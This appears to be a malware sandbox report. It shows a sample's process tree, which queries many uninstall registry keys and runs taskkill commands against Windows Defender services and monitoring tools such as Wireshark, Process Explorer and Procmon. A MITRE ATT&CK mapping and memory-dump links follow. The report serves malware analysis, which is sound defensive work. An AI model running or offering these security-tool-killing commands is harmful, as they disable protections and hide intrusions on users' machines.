    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:4748
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:4824
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:4880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:4900
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:4956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:4976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:5032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:5052
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5072
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:5108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4136
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:4220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:4232
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4156
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    PID:2052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:4284
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4312
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    PID:4376
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:4392
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4432
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    PID:4536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:4556
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:4584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    PID:4576
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:4688
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:4736
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4728
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:4816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:4840
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:4900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:4968
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:5060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:5080
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:4152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:4160
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4236
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:2892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:1860
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4156
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:4308
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:4372
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4556
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4604
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:4744
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:4860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:4936
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4900
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:4188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:4240
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:4100
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:4360
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4584
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4852
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4220
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4424
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4684
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2716-80-0x00007FFA23F00000-0x00007FFA248EC000-memory.dmp

Filesize
9.9MB

Download
memory/2716-110-0x000001AF76980000-0x000001AF76981000-memory.dmp

Filesize
4KB

Download
memory/2716-95-0x000001AF767D0000-0x000001AF767D1000-memory.dmp

Filesize
4KB

Download